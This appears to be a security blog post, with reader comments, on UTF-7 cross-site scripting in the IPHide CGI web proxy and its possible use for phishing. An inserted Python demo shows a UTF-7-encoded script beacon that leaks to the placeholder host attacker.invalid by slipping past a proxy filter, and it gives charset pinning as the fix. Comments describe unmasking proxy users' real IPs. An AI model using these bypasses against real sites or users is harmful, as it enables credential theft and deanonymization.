web application security lab

IPHide Vulnerable to UTF-7 And May Be Phishing

I like to report on these about once a month because they keep popping up and people keep selling them as if they were the be-all and end-all of privacy. Non-parsed-header CGI proxies are not secure from a privacy perspective. They just aren't. Not only are they vulnerable to XSS, they can leak your information to the very party you are trying to hide it from. IPHide.com is no different. IPHide is vulnerable to the UTF-7 XSS vector. That means any page you visit through IPHide and authenticate to is exposed to having your information stolen, which is bad enough, but more importantly, an injected payload can make your browser send traffic over the wire that reveals your real IP.

As I said in an earlier post, if you are relying on one of these to avoid getting kicked out of school or busted at the office, you had better think twice. Unlike a normal proxy, it relies heavily on two things: 1) being able to strip out or rewrite any content that could leak where you are really going, and 2) the content filter not using patterns that would pick up the fact that you are in fact surfing for porn, or hacking, or whatever it is you are doing that you shouldn't be. I must say it is ridiculously easy to get around content filters if you control both the client and the server; it is much harder to properly filter out all forms of active content.
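The two failure points above (the proxy's rewrite-and-strip pass, and a browser that is left to guess the charset) are easiest to see side by side. The following is an added example written for this page, not code from the original post and not CGIProxy's or IPHide's code: a hand-rolled UTF-7 encoder for the attacker's payload, a constructed stand-in for a proxy filter that only sees literal `<` and `"` bytes, and a simulated render under a pinned charset versus a sniffed UTF-7 charset. `proxy.example` and `attacker.invalid` are placeholder hostnames, and the sample page is constructed.

```python
import base64
import re

# RFC 2152 "Set D" plus the whitespace UTF-7 passes through directly. Everything
# else (including < > " = and the rest of Set O) goes into a +...- base64 run,
# which is exactly what hides a tag from a byte-level filter.
UTF7_DIRECT = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "'(),-./:? \t\r\n"
)


def utf7_obfuscate(text):
    """Encode text as UTF-7 with every non-Set-D character in a +...- run.

    RFC 2152 allows an encoder to emit Set O punctuation such as '<' directly,
    and Python's utf-7 codec may do so, so the attacker side is hand-rolled
    here; the stdlib decoder is still used to verify the output.
    """
    out, run = [], []

    def flush():
        if run:
            raw = "".join(run).encode("utf-16-be")
            b64 = base64.b64encode(raw).decode("ascii").rstrip("=")
            out.append("+" + b64 + "-")
            run.clear()

    for ch in text:
        if ch in UTF7_DIRECT:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out)


def proxy_filter(html):
    """Constructed stand-in for a CGI proxy's rewrite-and-strip pass (not
    CGIProxy's real code): drop script blocks and route absolute URLs in
    src/href attributes through the proxy. It only matches literal bytes."""
    html = re.sub(r"(?is)<script\b.*?</script>", "", html)
    html = re.sub(
        r'((?:src|href)=")(https?://[^"]+)"',
        lambda m: m.group(1) + "http://proxy.example/?url=" + m.group(2) + '"',
        html,
    )
    return html


def ensure_charset(content_type):
    """Hardening on the proxy side: pin the charset in Content-Type so the
    browser has no reason to sniff UTF-7 (assumes UTF-8 is the right default)."""
    if "charset=" in content_type.lower():
        return content_type
    return content_type + "; charset=utf-8"


def render_as(body, charset):
    """What the browser ends up with once it has picked, or been told, a charset."""
    return body.encode("ascii").decode(charset)


# Constructed sample: a page fetched through the proxy into which an attacker
# has injected a UTF-7 encoded beacon. The beacon's URL is absolute, so once it
# decodes the browser fetches attacker.invalid directly, not via the proxy.
BEACON = '<script>new Image().src="http://attacker.invalid/?leak"</script>'
PAGE = (
    '<html><body><a href="http://example.com/">link</a>'
    + utf7_obfuscate(BEACON)
    + "</body></html>"
)


def demo():
    """Run the page through the filter, then render it both ways."""
    filtered = proxy_filter(PAGE)
    return {
        "filtered": filtered,
        "utf8": render_as(filtered, "utf-8"),  # beacon stays inert +ADw-script... text
        "utf7": render_as(filtered, "utf-7"),  # beacon decodes into a live <script>
    }


if __name__ == "__main__":
    result = demo()
    print("charset pinned :", result["utf8"])
    print("charset sniffed:", result["utf7"])
```

Note that the literal `href` is rewritten to go through `proxy.example`, while the beacon URL hidden inside the UTF-7 run is untouched; the filter never saw a `<` or a `"`. The comments below make the same point from the other side: forcing a charset via HTTP headers is what takes UTF-7 off the table, which is why `ensure_charset` is the fix rather than a better tag regex.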

Now on to the second part. None of the links at the bottom of the page (FAQ, Privacy Policy, Terms of Service, or About Us) are valid links. So either this is just a terribly sloppy page, or it is a way to harvest information (login credentials) from people. Sort of like phishing, except that you are knowingly using a proxy. Kind of clever if that is what it is being used for. I don't claim to know one way or the other; it just struck me as an amusing way to abuse people's paranoia to get information out of them.

4 Responses to “IPHide Vulnerable to UTF-7 And May Be Phishing”

  1. Wladimir Palant Says:

    The links work for me, at least on the main page…

  2. RSnake Says:

    Weird, they are still broken for me, are you sure you’re clicking on the links on the bottom?

  3. yawnmoth Says:

    I wouldn’t say iphide.com is vulnerable so much as CGI Proxy - the software that they’re using - is. More information:

    http://www.jmarshall.com/tools/cgiproxy/

    Also, the UTF-7 vector that you’re using is of limited usefulness in IE7 because GET parameters are not UTF-7 decoded. More information:

    http://www.frostjedi.com/terra/scripts/demo/frameBug.html

    Now, if you force a charset via HTTP headers, UTF-7 won’t work, but… in IE6/7, UTF-16 will. The reason being that, at this point, the “Null breaks up cross site scripting vector”, as described on the XSS cheat sheet kicks in.

    Here’s a more complete demo:

    http://www.frostjedi.com/terra/scripts/ip_unmasker.php

    Combine this with the Java applet, as I have, and you can see someone’s “real” IP address even if they’re using both a CGI proxy and a traditional HTTP proxy.

  4. RSnake Says:

    Very nice. I wasn’t so interested in actually doing this, but yes, in fact that would be a better way to do that if you were actually trying to locate someone using this sort of CGI proxy.
